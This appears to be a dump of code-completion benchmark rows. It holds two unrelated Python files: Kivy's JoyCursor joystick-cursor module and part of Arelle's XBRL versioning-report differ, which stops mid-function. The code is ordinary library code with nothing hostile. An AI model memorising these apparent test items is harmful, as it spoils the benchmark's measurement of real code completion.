gt
stringclasses 1
value | context
stringlengths 2.49k
119k
|
|---|---|
'''
JoyCursor
=========
.. versionadded:: 1.10.0
The JoyCursor is a tool for navigating with a joystick as if using a mouse
or touch. Most of the actions that are possible for a mouse user are available
in this module.
For example:
* left click
* right click
* double click (two clicks)
* moving the cursor
* holding the button (+ moving at the same time)
* selecting
* scrolling
There are some properties that can be edited live, such as intensity of the
JoyCursor movement and toggling mouse button holding.
Usage
-----
For normal module usage, please see the :mod:`~kivy.modules` documentation
and these bindings:
+------------------+--------------------+
| Event | Joystick |
+==================+====================+
| cursor move | Axis 3, Axis 4 |
+------------------+--------------------+
| cursor intensity | Button 0, Button 1 |
+------------------+--------------------+
| left click | Button 2 |
+------------------+--------------------+
| right click | Button 3 |
+------------------+--------------------+
| scroll up | Button 4 |
+------------------+--------------------+
| scroll down | Button 5 |
+------------------+--------------------+
| hold button | Button 6 |
+------------------+--------------------+
| joycursor on/off | Button 7 |
+------------------+--------------------+
The JoyCursor, like Inspector, can also be imported and used as a normal
python module. This has the added advantage of being able to activate and
deactivate the module programmatically::
from kivy.lang import Builder
from kivy.base import runTouchApp
runTouchApp(Builder.load_string("""
#:import jc kivy.modules.joycursor
BoxLayout:
Button:
text: 'Press & activate with Ctrl+E or Button 7'
on_release: jc.create_joycursor(root.parent, root)
Button:
text: 'Disable'
on_release: jc.stop(root.parent, root)
"""))
'''
__all__ = ('start', 'stop', 'create_joycursor')
from kivy.clock import Clock
from kivy.logger import Logger
from kivy.uix.widget import Widget
from kivy.graphics import Color, Line
from kivy.properties import (
ObjectProperty,
NumericProperty,
BooleanProperty
)
class JoyCursor(Widget):
win = ObjectProperty()
activated = BooleanProperty(False)
cursor_width = NumericProperty(1.1)
cursor_hold = BooleanProperty(False)
intensity = NumericProperty(4)
dead_zone = NumericProperty(10000)
offset_x = NumericProperty(0)
offset_y = NumericProperty(0)
def __init__(self, **kwargs):
super(JoyCursor, self).__init__(**kwargs)
self.avoid_bring_to_top = False
self.size_hint = (None, None)
self.size = (21, 21)
self.set_cursor()
# draw cursor
with self.canvas:
Color(rgba=(0.19, 0.64, 0.81, 0.5))
self.cursor_ox = Line(
points=self.cursor_pts[:4],
width=self.cursor_width + 0.1
)
self.cursor_oy = Line(
points=self.cursor_pts[4:],
width=self.cursor_width + 0.1
)
Color(rgba=(1, 1, 1, 0.5))
self.cursor_x = Line(
points=self.cursor_pts[:4],
width=self.cursor_width
)
self.cursor_y = Line(
points=self.cursor_pts[4:],
width=self.cursor_width
)
self.pos = [-i for i in self.size]
def on_window_children(self, win, *args):
# pull JoyCursor to the front when added
# as a child directly to the window.
if self.avoid_bring_to_top:
return
self.avoid_bring_to_top = True
win.remove_widget(self)
win.add_widget(self)
self.avoid_bring_to_top = False
def on_activated(self, instance, activated):
# bind/unbind when JoyCursor's state is changed
if activated:
self.win.add_widget(self)
self.move = Clock.schedule_interval(self.move_cursor, 0)
self.win.fbind('on_joy_axis', self.check_cursor)
self.win.fbind('on_joy_button_down', self.set_intensity)
self.win.fbind('on_joy_button_down', self.check_dispatch)
self.win.fbind('mouse_pos', self.stop_cursor)
mouse_pos = self.win.mouse_pos
self.pos = (
mouse_pos[0] - self.size[0] / 2.0,
mouse_pos[1] - self.size[1] / 2.0
)
Logger.info('JoyCursor: joycursor activated')
else:
self.pos = [-i for i in self.size]
Clock.unschedule(self.move)
self.win.funbind('on_joy_axis', self.check_cursor)
self.win.funbind('on_joy_button_down', self.set_intensity)
self.win.funbind('on_joy_button_down', self.check_dispatch)
self.win.funbind('mouse_pos', self.stop_cursor)
self.win.remove_widget(self)
Logger.info('JoyCursor: joycursor deactivated')
def set_cursor(self, *args):
# create cursor points
px, py = self.pos
sx, sy = self.size
self.cursor_pts = [
px, py + round(sy / 2.0), px + sx, py + round(sy / 2.0),
px + round(sx / 2.0), py, px + round(sx / 2.0), py + sy
]
def check_cursor(self, win, stickid, axisid, value):
# check axes and set offset if a movement is registered
intensity = self.intensity
dead = self.dead_zone
if axisid == 3:
if value < -dead:
self.offset_x = -intensity
elif value > dead:
self.offset_x = intensity
else:
self.offset_x = 0
elif axisid == 4:
# invert Y axis to behave like mouse
if value < -dead:
self.offset_y = intensity
elif value > dead:
self.offset_y = -intensity
else:
self.offset_y = 0
else:
self.offset_x = 0
self.offset_y = 0
def set_intensity(self, win, stickid, buttonid):
# set intensity of joycursor with joystick buttons
intensity = self.intensity
if buttonid == 0 and intensity > 2:
intensity -= 1
elif buttonid == 1:
intensity += 1
self.intensity = intensity
def check_dispatch(self, win, stickid, buttonid):
if buttonid == 6:
self.cursor_hold = not self.cursor_hold
if buttonid not in (2, 3, 4, 5, 6):
return
x, y = self.center
# window event, correction necessary
y = self.win.system_size[1] - y
modifiers = []
actions = {
2: 'left',
3: 'right',
4: 'scrollup',
5: 'scrolldown',
6: 'left'
}
button = actions[buttonid]
self.win.dispatch('on_mouse_down', x, y, button, modifiers)
if not self.cursor_hold:
self.win.dispatch('on_mouse_up', x, y, button, modifiers)
def move_cursor(self, *args):
# move joycursor as a mouse
self.pos[0] += self.offset_x
self.pos[1] += self.offset_y
modifiers = []
if self.cursor_hold:
self.win.dispatch(
'on_mouse_move',
self.center[0],
self.win.system_size[1] - self.center[1],
modifiers
)
def stop_cursor(self, instance, mouse_pos):
# pin the cursor to the mouse pos
self.offset_x = 0
self.offset_y = 0
self.pos = (
mouse_pos[0] - self.size[0] / 2.0,
mouse_pos[1] - self.size[1] / 2.0
)
def on_pos(self, instance, new_pos):
self.set_cursor()
self.cursor_x.points = self.cursor_pts[:4]
self.cursor_y.points = self.cursor_pts[4:]
self.cursor_ox.points = self.cursor_pts[:4]
self.cursor_oy.points = self.cursor_pts[4:]
def keyboard_shortcuts(self, win, scancode, *args):
modifiers = args[-1]
if scancode == 101 and modifiers == ['ctrl']:
self.activated = not self.activated
return True
elif scancode == 27:
if self.activated:
self.activated = False
return True
def joystick_shortcuts(self, win, stickid, buttonid):
if buttonid == 7:
self.activated = not self.activated
if self.activated:
self.pos = [round(i / 2.0) for i in win.size]
def create_joycursor(win, ctx, *args):
'''Create a JoyCursor instance attached to the *ctx* and bound to the
Window's :meth:`~kivy.core.window.WindowBase.on_keyboard` event for
capturing the keyboard shortcuts.
:Parameters:
`win`: A :class:`Window <kivy.core.window.WindowBase>`
The application Window to bind to.
`ctx`: A :class:`~kivy.uix.widget.Widget` or subclass
The Widget for JoyCursor to attach to.
'''
ctx.joycursor = JoyCursor(win=win)
win.bind(children=ctx.joycursor.on_window_children,
on_keyboard=ctx.joycursor.keyboard_shortcuts)
# always listen for joystick input to open the module
# (like a keyboard listener)
win.fbind('on_joy_button_down', ctx.joycursor.joystick_shortcuts)
def start(win, ctx):
Clock.schedule_once(lambda *t: create_joycursor(win, ctx))
def stop(win, ctx):
'''Stop and unload any active JoyCursors for the given *ctx*.
'''
if hasattr(ctx, 'joycursor'):
ctx.joycursor.activated = False
win.unbind(children=ctx.joycursor.on_window_children,
on_keyboard=ctx.joycursor.keyboard_shortcuts)
win.funbind('on_joy_button_down', ctx.joycursor.joystick_shortcuts)
win.remove_widget(ctx.joycursor)
del ctx.joycursor
|
|
'''
Created on Nov 11, 2010
@author: Mark V Systems Limited
(c) Copyright 2010-2013 Mark V Systems Limited, All rights reserved.
'''
import os, re, datetime
from collections import defaultdict
from arelle import (XbrlConst, XbrlUtil, XmlUtil, UrlUtil, ModelXbrl, ModelDocument, ModelVersObject,
Version, XmlValidate)
from arelle.ModelDtsObject import ModelConcept
from arelle.ModelObject import ModelObject
from arelle.ModelValue import qname, QName
from arelle.FileSource import FileNamedStringIO
def create(modelXbrlFromDTS, modelXbrlToDTS):
"""Returns a new modelXbrl representing a Version Report object, by creation of its modelXbrl, its ModelVersReport (modelDocument), and diffing the from and to DTSes
:param modelXbrlFromDTS: fromDTS DTS object
:type modelXbrlFromDTS: ModelXbrl
:param modelXbrlToDTS: toDTS DTS object
:type modelXbrlToDTS: ModelXbrl
"""
modelXbrlVersReport = ModelXbrl.create(modelXbrlFromDTS.modelManager)
modelVersReport = ModelVersReport(
ModelDocument.Type.VERSIONINGREPORT)
modelXbrlVersReport.modelDocument = modelVersReport
modelVersReport.diffDTSes(modelXbrlFromDTS, modelXbrlToDTS)
return modelVersReport
relationshipSetArcAttributesExclusion = {
"{http://www.w3.org/1999/xlink}from",
"{http://www.w3.org/1999/xlink}to",
"{http://www.w3.org/1999/xlink}actuate",
"{http://www.w3.org/1999/xlink}show",
"{http://www.w3.org/1999/xlink}title",
"{http://www.w3.org/XML/1998/namespace}lang",
"{http://www.w3.org/XML/1998/namespace}space",
"id", "use","priority","order"
}
authoritiesEquivalence = {
"http://xbrl.iasb.org": "IFRS", "http://xbrl.ifrs.org": "IFRS",
"http://xbrl.us": "XBRL-US", "http://fasb.org": "XBRL-US", "http://xbrl.sec.gov": "XBRL-US",
}
dateRemovalPattern = re.compile(r"[/]?(draft-)?(19|20)[0-9][0-9](-[01][0-9](-[0-3][0-9])?)?")
numberRemovalPattern = re.compile(r"[/]?[0-9][0-9\.]*")
class ModelVersReport(ModelDocument.ModelDocument):
"""
.. class:: ModelVersReport(type=ModelDocument.Type.VERSIONINGREPORT, uri=None, filepath=None, xmlDocument=None)
ModelVersReport is a specialization of ModelDocument for Versioning Reports.
(for parameters and inherited attributes, please see ModelDocument)
.. attribute:: fromDTS
From DTS (modelXbrl object)
.. attribute:: toDTS
To DTS (modelXbrl object)
.. attribute:: assignments
Dict by id of ModelAssignment objects
.. attribute:: actions
Dict by id of ModelAction objects
.. attribute:: namespaceRenameFrom
Dict by fromURI of ModelNamespaceRename objects
.. attribute:: namespaceRenameTo
Dict by toURI of ModelNamespaceRename objects
.. attribute:: roleChanges
Dict by uri of ModelRoleChange objects
.. attribute:: conceptUseChanges
List of ModelConceptUseChange objects
.. attribute:: conceptDetailsChanges
List of ModelConceptDetailsChange objects
.. attribute:: equivalentConcepts
Dict by qname of equivalent qname
.. attribute:: relatedConceptsDefaultDict by qname of list of related concept qnames
.. attribute:: relationshipSetChanges List of ModelRelationshipSet objects
.. attribute:: instanceAspectChanges
List of ModelInstanceAspectChange objects
.. attribute:: typedDomainsCorrespond
Dict by (fromDimConcept,toDimConcept) of bool that is True if corresponding
"""
def __init__(self, modelXbrl,
type=ModelDocument.Type.VERSIONINGREPORT,
uri=None, filepath=None, xmlDocument=None):
super(ModelVersReport, self).__init__(modelXbrl, type, uri, filepath, xmlDocument)
self.fromDTS = None
self.toDTS = None
self.assignments = {}
self.actions = {}
self.namespaceRenameFrom = {}
self.namespaceRenameFromURI = {}
self.namespaceRenameTo = {}
self.namespaceRenameToURI = {}
self.roleChanges = {}
self.conceptUseChanges = []
self.conceptDetailsChanges = []
self.equivalentConcepts = {}
self.relatedConcepts = defaultdict(set)
self.relationshipSetChanges = []
self.instanceAspectChanges = []
self.typedDomainsCorrespond = {}
def close(self, *args, **kwargs):
"""Closes any views, formula output instances, modelDocument(s), and dereferences all memory used
"""
super(ModelVersReport, self).close(*args, **kwargs)
def versioningReportDiscover(self, rootElement):
"""Initiates discovery of versioning report
:param rootElement: lxml root element of versioning report
:type rootElement: xml element node
"""
XmlValidate.validate(self.modelXbrl, rootElement) # schema validate
actionRelatedFromMdlObjs = []
actionRelatedToMdlObjs = []
modelAction = None
# add self to namespaced document
self.xmlRootElement = rootElement
try:
for modelObject in rootElement.iterdescendants():
if isinstance(modelObject, ModelObject):
ln = modelObject.localName
ns = modelObject.namespaceURI
if ns == XbrlConst.ver:
if ln == "action":
ModelVersObject.relateConceptMdlObjs(self, actionRelatedFromMdlObjs, actionRelatedToMdlObjs)
modelAction = modelObject
actionRelatedFromMdlObjs = []
actionRelatedToMdlObjs = []
elif (ln == "fromDTS" or ln == "toDTS") and not getattr(self, ln):
schemaRefElts = XmlUtil.children(modelObject, XbrlConst.link, "schemaRef")
if schemaRefElts:
if len(schemaRefElts) == 1 and schemaRefElts[0].get("{http://www.w3.org/1999/xlink}href") is not None:
DTSmodelXbrl = ModelXbrl.load(self.modelXbrl.modelManager,
schemaRefElts[0].get("{http://www.w3.org/1999/xlink}href"),
"loading validation report",
base=self.baseForElement(schemaRefElts[0]))
else: # need multi-schemaRefs DTS
DTSmodelXbrl = ModelXbrl.create(self.modelXbrl.modelManager,
newDocumentType=ModelDocument.Type.DTSENTRIES,
url=self.uri[:-4] + "-" + ln + ".dts", isEntry=True)
DTSdoc = DTSmodelXbrl.modelDocument
DTSdoc.inDTS = True
for schemaRefElt in schemaRefElts:
if schemaRefElt.get("{http://www.w3.org/1999/xlink}href") is not None:
doc = ModelDocument.load(DTSmodelXbrl,
schemaRefElt.get("{http://www.w3.org/1999/xlink}href"),
base=self.baseForElement(schemaRefElt))
DTSdoc.referencesDocument[doc] = "import" #fake import
doc.inDTS = True
if DTSmodelXbrl is not None:
setattr(self, ln, DTSmodelXbrl)
elif ln in ("namespaceRename", "roleChange"):
if modelAction is not None:
modelAction.events.append(modelObject)
elif self.fromDTS is None or self.toDTS is None:
pass
elif ns in (XbrlConst.vercu, XbrlConst.vercb):
if ln in ("conceptRename", "conceptAdd", "conceptDelete"):
if modelAction is not None:
modelAction.events.append(modelObject)
if ln == "conceptRename":
modelObject.setConceptEquivalence()
elif ln == "conceptDelete":
actionRelatedFromMdlObjs.append(modelObject)
elif ln == "conceptAdd":
actionRelatedToMdlObjs.append(modelObject)
elif ns in (XbrlConst.vercd, XbrlConst.verce):
if ln in {"conceptIDChange", "conceptTypeChange", "conceptSubstitutionGroupChange",
"conceptDefaultChange", "conceptNillableChange",
"conceptAbstractChange", "conceptBlockChange", "conceptFixedChange",
"conceptFinalChange", "conceptPeriodTypeChange", "conceptBalanceChange",
"conceptAttributeAdd", "conceptAttributeDelete", "conceptAttributeChange",
"tupleContentModelChange",
"conceptLabelAdd", "conceptLabelDelete", "conceptLabelChange",
"conceptReferenceAdd", "conceptReferenceDelete", "conceptReferenceChange"}:
if modelAction is not None:
modelAction.events.append(modelObject)
elif ns == XbrlConst.verrels:
if ln in {"relationshipSetModelChange", "relationshipSetModelAdd", "relationshipSetModelDelete"}:
if modelAction is not None:
modelAction.events.append(modelObject)
modelRelationshipSetEvent = modelObject
elif ln in ("fromRelationshipSet", "toRelationshipSet"):
if modelRelationshipSetEvent is not None:
modelRelationshipSet = modelObject
if ln == "fromRelationshipSet":
modelRelationshipSetEvent.fromRelationshipSet = modelObject
else:
modelRelationshipSetEvent.toRelationshipSet = modelObject
modelObject.modelRelationshipSetEvent = modelRelationshipSetEvent
elif ln == "relationships":
if modelRelationshipSet is not None:
modelRelationshipSet.relationships.append(modelObject)
modelObject.modelRelationshipSet = modelRelationshipSet
elif ns in (XbrlConst.verdim, XbrlConst.veria):
if ln in ("aspectModelChange", "aspectModelAdd", "aspectModelDelete"):
if modelAction is not None:
modelAction.events.append(modelObject)
aspectModelEvent = modelObject
modelAspects = None
elif ln in ("fromAspects", "toAspects"):
if aspectModelEvent is not None:
modelAspects = modelObject
if ln == "fromAspects":
aspectModelEvent.fromAspects = modelObject
else:
aspectModelEvent.toAspects = modelObject
modelObject.aspectModelEvent = aspectModelEvent
elif ln in ("concepts", "explicitDimension", "typedDimension", "segment", "scenario",
"entityIdentifier", "period", "location", "unit"):
modelAspect = modelObject
if modelAspects is not None:
modelAspects.aspects.append(modelObject)
modelObject.modelAspects = modelAspects
modelMulDivBy = None
elif ln in ("concept", "member"):
if modelAspect is not None:
modelAspect.relatedConcepts.append(modelObject)
modelObject.modelAspect = modelAspect
elif ln in ("startDate", "endDate", "instant", "forever"):
if modelAspect is not None:
modelAspect.relatedPeriods.append(modelObject)
modelObject.modelAspect = modelAspect
elif ln in ("multiplyBy", "divideBy"):
if modelAspect is not None:
modelAspect.relatedMeasures.append(modelObject)
modelObject.modelAspect = modelAspect
modelMulDivBy = modelObject
elif ln == "measure":
if modelMulDivBy is not None:
modelMulDivBy.relatedMeasures.append(modelObject)
modelObject.modelAspect = modelMulDivBy
elif modelAspect is not None:
modelAspect.relatedMeasures.append(modelObject)
modelObject.modelAspect = modelAspect
ModelVersObject.relateConceptMdlObjs(self, actionRelatedFromMdlObjs, actionRelatedToMdlObjs)
# do linkbaseRef's at end after idObjects all loaded
for element in rootElement.iterdescendants("{http://www.xbrl.org/2003/linkbase}linkbaseRef"):
self.schemaLinkbaseRefDiscover(element)
except (ValueError, LookupError) as err:
self.modelXbrl.modelManager.addToLog("discovery: {0} error {1}".format(
os.path.basename(self.uri),
err))
def entryURIs(self, DTS):
if DTS.modelDocument:
if DTS.modelDocument.type == ModelDocument.Type.DTSENTRIES:
return sorted([mdlDoc.uri for mdlDoc in DTS.modelDocument.referencesDocument.keys()])
else:
return [DTS.uri]
return []
def diffDTSes(self, reportOutput, fromDTS, toDTS, assignment="technical", schemaDir=None):
"""Initiates diffing of fromDTS and toDTS, populating the ModelVersReport object, and saving the
versioning report file).
:param versReporFile: file name to save the versioning report
:type versReporFile: str
:param fromDTS: first modelXbrl's (DTSes) to be diffed
:type fromDTS: ModelXbrl
:param toDTS: second modelXbrl's (DTSes) to be diffed
:type toDTS: ModelXbrl
:param assignment: 'technical', 'business', etc. for the assignment clause
:type assignment: str
:param schemaDir: Directory for determination of relative path for versioning xsd files (versioning-base.xsd, etc).
:type schemaDir: str
"""
versReportFile = str(reportOutput) # may be a FileNamedStringIO, in which case str( ) is the filename
self.uri = os.path.normpath(versReportFile)
from arelle import FileSource
self.modelXbrl.fileSource = FileSource.FileSource(self.uri)
self.fromDTS = fromDTS
self.toDTS = toDTS
assignment = assignment.lower()
if ":" in assignment: categoryType = assignment
elif assignment.startswith("technical"): categoryType = "technicalCategory"
elif assignment.startswith("business"): categoryType = "businessCategory"
else: categoryType = "errataCategory"
import io
file = io.StringIO(
#'<?xml version="1.0" encoding="UTF-8"?>'
'<nsmap>' # for lxml expandable namespace purposes
'<!-- Generated by Arelle(r) version {3} at {4} -->'
'<report'
' xmlns="http://xbrl.org/2013/versioning-base"'
' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
' xmlns:link="http://www.xbrl.org/2003/linkbase"'
' xmlns:xlink="http://www.w3.org/1999/xlink"'
# for generated testcases the schema locations need to be relative to test case directory
#' xsi:schemaLocation="'
# 'http://xbrl.org/2010/versioning-base http://xbrl.org/2010/versioning-base '
# 'http://xbrl.org/2010/versioning-concept-basic http://xbrl.org/2010/versioning-concept-basic '
# 'http://xbrl.org/2010/versioning-concept-extended http://xbrl.org/2010/versioning-concept-extended '
#'"
'>'
'<!-- link:linkbaseRef xlink:type="simple"'
' xlink:arcrole="http://www.w3.org/1999/xlink/properties/linkbase"'
' xlink:title="documentation"'
' xlink:href="sample.xml"/ -->'
'<fromDTS>{0}</fromDTS>'
'<toDTS>{1}</toDTS>'
'<assignment id="versioningTask"><{2}/></assignment>'
'</report></nsmap>'.format(
''.join(['<link:schemaRef xlink:type="simple" xlink:href="{0}"/>'.format(self.relativeUri(uri))
for uri in self.entryURIs(fromDTS)]),
''.join(['<link:schemaRef xlink:type="simple" xlink:href="{0}"/>'.format(self.relativeUri(uri))
for uri in self.entryURIs(toDTS)]),
categoryType,
Version.version,
format(datetime.datetime.utcnow().strftime("%Y-%m-%d %H:%M UTC")))
)
from arelle.ModelObjectFactory import parser
self.parser, self.parserLookupName, self.parserLookupClass = parser(self.modelXbrl,None)
from lxml import etree
self.xmlDocument = etree.parse(file,parser=self.parser,base_url=self.uri)
file.close()
self.xmlDocument.getroot().init(self)
for self.reportElement in self.xmlDocument.iter(tag="{http://xbrl.org/2013/versioning-base}report"):
self.xmlRootElement = self.reportElement
self.actionNum = 1
self.modelXbrl.modelManager.showStatus(_("Comparing namespaces"))
self.diffNamespaces()
self.modelXbrl.modelManager.showStatus(_("Comparing roles"))
self.diffRoles()
self.modelXbrl.modelManager.showStatus(_("Comparing concepts"))
self.diffConcepts()
for arcroleUri in (XbrlConst.parentChild, XbrlConst.summationItem, XbrlConst.essenceAlias, XbrlConst.requiresElement, XbrlConst.generalSpecial):
self.modelXbrl.modelManager.showStatus(_("Comparing {0} relationships").format(os.path.basename(arcroleUri)))
self.diffRelationshipSet(arcroleUri)
self.modelXbrl.modelManager.showStatus(_("Comparing dimension defaults"))
self.diffDimensionDefaults()
self.modelXbrl.modelManager.showStatus(_("Comparing explicit dimensions"))
self.diffDimensions()
# determine namespaces
schemaLocations = []
if schemaDir is not None:
schemasRelPath = os.path.relpath(schemaDir, os.path.dirname(versReportFile)) + os.sep
for prefix in self.reportElement.nsmap.values():
if prefix == XbrlConst.ver:
schemaLocations.append(XbrlConst.ver)
schemaLocations.append(schemasRelPath + "versioning-base.xsd")
elif prefix == XbrlConst.vercu:
schemaLocations.append(XbrlConst.vercu)
schemaLocations.append(schemasRelPath + "versioning-concept-use.xsd")
elif prefix == XbrlConst.vercd:
schemaLocations.append(XbrlConst.vercd)
schemaLocations.append(schemasRelPath + "versioning-concept-details.xsd")
elif prefix == XbrlConst.verrels:
schemaLocations.append(XbrlConst.verrels)
schemaLocations.append(schemasRelPath + "versioning-relationship-sets.xsd")
elif prefix == XbrlConst.verdim:
schemaLocations.append(XbrlConst.verdim)
schemaLocations.append(schemasRelPath + "versioning-dimensions.xsd")
elif prefix == XbrlConst.veria:
schemaLocations.append(XbrlConst.veria)
schemaLocations.append(schemasRelPath + "versioning-instance-aspects.xsd")
self.reportElement.set("{http://www.w3.org/2001/XMLSchema-instance}schemaLocation",
" ".join(schemaLocations))
self.modelXbrl.modelManager.showStatus(_("Checking report file"))
self.modelXbrl.modelDocument = self # model document is now established
self.versioningReportDiscover(self.reportElement)
self.modelXbrl.modelManager.showStatus(_("Writing report file"))
if isinstance(reportOutput, FileNamedStringIO):
fh = reportOutput
else:
fh = open(versReportFile, "w", encoding="utf-8")
XmlUtil.writexml(fh, self.xmlDocument, encoding="utf-8")
if not isinstance(reportOutput, FileNamedStringIO):
fh.close()
self.filepath = versReportFile
self.modelXbrl.modelManager.showStatus(_("C report file"))
self.modelXbrl.modelManager.showStatus(_("ready"), 2000)
def diffNamespaces(self):
# build fomr and to lists based on namespaces
self.namespaceRenameFromURI = {}
self.namespaceRenameToURI = {}
fromNSes = set()
toNSes = set()
for fromModelDoc in self.fromDTS.urlDocs.values():
if fromModelDoc.type == ModelDocument.Type.SCHEMA:
fromNSes.add(fromModelDoc.targetNamespace)
for toModelDoc in self.toDTS.urlDocs.values():
if toModelDoc.type == ModelDocument.Type.SCHEMA:
toNSes.add(toModelDoc.targetNamespace)
self.diffURIs( fromNSes, toNSes,
"namespaceRename",
(self.rolePathlessDatelessMatchPattern, self.roleNumlessMatchPattern, self.roleNoFromToMatchPattern),
self.namespaceRenameFromURI, self.namespaceRenameToURI)
def diffRoles(self):
self.roleChangeFromURI = {}
self.roleChangeToURI = {}
self.diffURIs( set( self.fromDTS.roleTypes.keys() ),
set( self.toDTS.roleTypes.keys() ),
"roleChange",
(self.rolePathlessDatelessMatchPattern, self.roleNumlessMatchPattern, self.roleNoFromToMatchPattern),
self.roleChangeFromURI, self.roleChangeToURI )
def diffURIs(self, fromURIs, toURIs, eventName, matchers, changeFrom, changeTo):
# remove common roles from each
commonRoles = fromURIs & toURIs
fromURIs -= commonRoles
toURIs -= commonRoles
for matcher in matchers:
# look for roles matching on matcher subpattern
fromMatchURIs = defaultdict(list)
toMatchURIs = defaultdict(list)
# try to URIs based on numbers in uri path removed (e.g., ignoring dates)
for matchURIs, origURIs in ((fromMatchURIs,fromURIs),(toMatchURIs,toURIs)):
for uri in origURIs:
matchURIs[matcher(uri)].append(uri)
for fromMatchURI, fromMatchedURIs in fromMatchURIs.items():
for toURI in toMatchURIs.get(fromMatchURI,[]):
for fromURI in fromMatchedURIs:
self.createBaseEvent(eventName, fromURI, toURI)
changeFrom[fromURI] = toURI
changeTo[toURI] = fromURI
# removed from consideration by next pass on final path segment
fromURIs.discard(fromURI)
toURIs.discard(toURI)
def uriNumlessMatchPattern(self, uri):
# remove date and numbers from uri (for now, more sophisticated later)
return ''.join((c if str.isalpha(c) or c == '/' else '') for c in uri)
def roleNumlessMatchPattern(self, role):
# remove date and numbers from role except last path segment
basepart, sep, lastpart = role.rpartition("/")
return ''.join((c if str.isalpha(c) or c == '/' else '') for c in basepart) + \
((sep + lastpart) if lastpart else "")
def rolePathlessDatelessMatchPattern(self, role):
# remove date from path (including / if immediately before date)
datelessRole = dateRemovalPattern.sub("", role)
# remove intermediate role path elements between authority and end path segment (after date removal)
basepart, sep, lastpart = datelessRole.rpartition("/")
origAuthority = UrlUtil.authority(role)
matchedAuthority = authoritiesEquivalence.get(origAuthority,origAuthority)
return matchedAuthority + ((sep + lastpart) if lastpart else "")
def roleNoFromToMatchPattern(self, role):
# remove intermediate role path elements between authority and end path segment
# for roland test case generation
basepart, sep, lastpart = role.rpartition("/")
if lastpart.endswith("_to"):
lastpart = lastpart[:-3]
elif lastpart.endswith("_from"):
lastpart = lastpart[:-5]
return UrlUtil.authority(role) + ((sep + lastpart) if lastpart else "")
def diffConcepts(self):
toConceptsMatched = set()
vercu = XbrlConst.vercu
vercd = XbrlConst.vercd
for fromConceptQname, fromConcept in self.fromDTS.qnameConcepts.items():
if not fromConcept.isItem and not fromConcept.isTuple:
continue
toConceptQname = self.toDTSqname(fromConceptQname)
if toConceptQname in self.toDTS.qnameConcepts:
toConcept = self.toDTS.qnameConcepts[toConceptQname]
toConceptsMatched.add(toConceptQname)
# compare concepts
action = None # keep same action for all of same concept's changes
if fromConcept.id != toConcept.id:
action = self.createConceptEvent(vercd, "vercd:conceptIDChange", fromConcept, toConcept, action, fromValue=fromConcept.id, toValue=toConcept.id)
if fromConcept.substitutionGroupQname != self.fromDTSqname(toConcept.substitutionGroupQname):
action = self.createConceptEvent(vercd, "vercd:conceptSubstitutionGroupChange", fromConcept, toConcept, action, fromValue=fromConcept.substitutionGroupQname, toValue=self.toDTSqname(toConcept.substitutionGroupQname))
if fromConcept.isItem and toConcept.isItem:
if fromConcept.typeQname != self.fromDTSqname(toConcept.typeQname):
action = self.createConceptEvent(vercd, "vercd:conceptTypeChange", fromConcept, toConcept, action, fromValue=fromConcept.typeQname, toValue=toConcept.typeQname)
if fromConcept.nillable != toConcept.nillable:
action = self.createConceptEvent(vercd, "vercd:conceptNillableChange", fromConcept, toConcept, action, fromValue=fromConcept.nillable, toValue=toConcept.nillable)
if fromConcept.abstract != toConcept.abstract:
action = self.createConceptEvent(vercd, "vercd:conceptAbstractChange", fromConcept, toConcept, action, fromValue=fromConcept.abstract, toValue=toConcept.abstract)
if fromConcept.isItem and toConcept.isItem:
if fromConcept.block != toConcept.block:
action = self.createConceptEvent(vercd, "vercd:conceptBlockChange", fromConcept, toConcept, action, fromValue=fromConcept.block, toValue=toConcept.block)
if fromConcept.default != toConcept.default:
action = self.createConceptEvent(vercd, "vercd:conceptDefaultChange", fromConcept, toConcept, action, fromValue=fromConcept.default, toValue=toConcept.default)
if fromConcept.fixed != toConcept.fixed:
action = self.createConceptEvent(vercd, "vercd:conceptFixedChange", fromConcept, toConcept, action, fromValue=fromConcept.fixed, toValue=toConcept.fixed)
if fromConcept.final != toConcept.final:
action = self.createConceptEvent(vercd, "vercd:conceptFinalChange", fromConcept, toConcept, action, fromValue=fromConcept.final, toValue=toConcept.final)
if fromConcept.periodType != toConcept.periodType:
action = self.createConceptEvent(vercd, "vercd:conceptPeriodTypeChange", fromConcept, toConcept, action, fromValue=fromConcept.periodType, toValue=toConcept.periodType)
if fromConcept.balance != toConcept.balance:
action = self.createConceptEvent(vercd, "vercd:conceptBalanceChange", fromConcept, toConcept, action, fromValue=fromConcept.balance, toValue=toConcept.balance)
if fromConcept.isTuple and toConcept.isTuple:
fromType = fromConcept.type # it is null for xsd:anyType
toType = toConcept.type
# TBD change to xml comparison with namespaceURI mappings, prefixes ignored
if (fromType is not None and toType is not None and
not XbrlUtil.nodesCorrespond(self.fromDTS, fromType, toType, self.toDTS)):
action = self.createConceptEvent(vercd, "vercd:tupleContentModelChange", fromConcept, toConcept, action)
# custom attributes in from Concept
fromCustAttrs = {}
toCustAttrs = {}
for concept, attrs in ((fromConcept,fromCustAttrs),(toConcept,toCustAttrs)):
for attrName, attrValue in concept.items():
attrQname = qname(attrName)
if (attrName not in ("abstract","block","default","final","fixed","form","id","maxOccurs",
"minOccurs","name","nillable","ref","substitutionGroup","type") and
attrQname.namespaceURI != XbrlConst.xbrli and
attrQname.namespaceURI != XbrlConst.xbrldt):
attrs[concept.prefixedNameQname(attrQname)] = attrValue
for attr in fromCustAttrs.keys():
if attr not in toCustAttrs:
action = self.createConceptEvent(vercd, "vercd:conceptAttributeDelete", fromConcept, None, action, fromCustomAttribute=attr, fromValue=fromCustAttrs[attr])
elif fromCustAttrs[attr] != toCustAttrs[attr]:
action = self.createConceptEvent(vercd, "vercd:conceptAttributeChange", fromConcept, toConcept, action, fromCustomAttribute=attr, toCustomAttribute=attr, fromValue=fromCustAttrs[attr], toValue=toCustAttrs[attr])
for attr in toCustAttrs.keys():
if attr not in fromCustAttrs:
action = self.createConceptEvent(vercd, "vercd:conceptAttributeAdd", None, toConcept, action, toCustomAttribute=attr, toValue=toCustAttrs[attr])
# labels, references from each concept
for event, arcroles in (("vercd:conceptLabel", (XbrlConst.conceptLabel, XbrlConst.elementLabel)),
("vercd:conceptReference", (XbrlConst.conceptReference, XbrlConst.elementReference))):
fromResources = {}
toResources = {}
for dts, concept, resources in ((self.fromDTS, fromConcept, fromResources),
(self.toDTS, toConcept, toResources)):
for arcrole in arcroles:
resourcesRelationshipSet = dts.relationshipSet(arcrole)
if resourcesRelationshipSet:
for rel in resourcesRelationshipSet.fromModelObject(concept):
resource = rel.toModelObject
